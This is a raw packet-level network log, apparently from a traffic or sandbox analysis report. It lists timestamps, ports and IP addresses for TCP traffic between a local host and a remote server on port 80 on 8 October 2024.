Oct 8, 2024 03:30:55.754925966 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754937887 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.754942894 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.754964113 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755006075 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755023003 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755038023 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755047083 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755055904 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755072117 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755074024 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755089998 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755106926 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755114079 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755143881 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755167961 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755183935 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755211115 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755222082 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755228996 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755245924 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755261898 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755264997 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755279064 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755296946 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755297899 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755316019 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755332947 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755498886 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755517006 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755532026 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755548000 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755548954 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755568027 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755574942 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755584955 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755605936 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755606890 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755634069 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755644083 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755656004 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755671978 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755688906 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755695105 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755712032 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755726099 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755731106 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755748987 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755765915 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755769014 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755783081 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755800009 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755800962 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755815029 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755836010 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755878925 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755894899 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755911112 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755918026 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755928993 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755947113 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755948067 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755963087 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755980015 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.755985022 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.755995989 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756011963 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756016970 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756028891 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756050110 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756139040 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756155014 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756171942 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756181002 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756181002 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756189108 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756206989 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756222963 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756239891 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756249905 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756249905 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756272078 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756282091 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756299973 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756315947 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756330967 CEST  80     49730  147.45.44.104  192.168.2.4
Oct 8, 2024 03:30:55.756335974 CEST  49730  80     192.168.2.4    147.45.44.104
Oct 8, 2024 03:30:55.756350040 CEST  80     49730  147.45.44.104  192.168.2.4
                                                  Oct 8, 2024 03:30:55.756370068 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756376982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756392956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756408930 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756413937 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.756424904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.756444931 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.806931019 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.843832970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843857050 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843873978 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843889952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843908072 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843924046 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.843941927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844037056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844037056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844037056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844366074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844382048 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844410896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844412088 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844427109 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844444990 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844450951 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844461918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844480038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844481945 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844516039 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844599009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844619036 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844635963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844655037 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844661951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844677925 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844691992 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844700098 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844708920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844724894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844738007 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844758987 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844774008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844784021 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844790936 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844809055 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844810009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844839096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844850063 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844856977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844872952 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844888926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844892979 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844909906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844937086 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844940901 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844957113 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844971895 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.844983101 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.844989061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845005989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845010996 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845022917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845042944 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845082045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845096111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845110893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845120907 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845129013 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845144033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845149040 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845170975 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845180988 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845186949 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845204115 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845220089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845225096 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845247984 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845257998 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845266104 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845283031 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845299006 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845302105 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845316887 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845334053 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845411062 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845426083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845444918 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845448017 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845462084 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845480919 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845490932 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845506907 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845521927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845532894 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845552921 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845561981 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845570087 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845586061 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845606089 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845614910 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845628977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845644951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845649958 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845662117 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845679045 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845684052 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845695972 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845714092 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845716000 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845756054 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845777035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845792055 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845817089 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845828056 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845834970 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845851898 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845868111 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845873117 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845884085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845900059 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845904112 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845936060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.845973015 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.845988989 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846004009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846029043 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846031904 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846050024 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846065998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846069098 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846082926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846097946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846101046 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846115112 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846137047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846163034 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846179962 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846199989 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846330881 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846347094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846363068 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846368074 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846379995 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846395969 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846396923 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846411943 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846427917 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846436024 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846447945 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846463919 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846466064 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846479893 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846496105 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846501112 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846513033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846530914 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846533060 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846566916 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846585035 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846600056 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846613884 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846630096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846636057 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846646070 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846662998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846667051 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846679926 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846698999 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846703053 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846744061 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846754074 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846771955 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846786976 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846805096 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846808910 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846822977 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846838951 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846838951 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846865892 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846884966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846924067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846951008 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846965075 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.846970081 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.846987963 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847003937 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847006083 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.847021103 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847037077 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847040892 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.847054005 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847070932 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.847071886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.847105026 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934293032 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934314966 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934331894 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934457064 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934467077 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934473038 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934489012 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934501886 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934508085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934534073 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934875965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934917927 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934936047 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934936047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.934952974 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934969902 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.934987068 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935028076 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935059071 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935075998 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935091019 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935105085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935117960 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935137033 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935156107 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935175896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935179949 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935201883 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935213089 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935220003 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935237885 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935250044 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935266018 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935280085 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935282946 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935307026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935321093 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935326099 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935343027 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935362101 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.935370922 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.935429096 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:55.936131954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:55.936156988 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116059065 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116075993 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116092920 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116118908 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116134882 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116151094 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116167068 CEST8049730147.45.44.104192.168.2.4
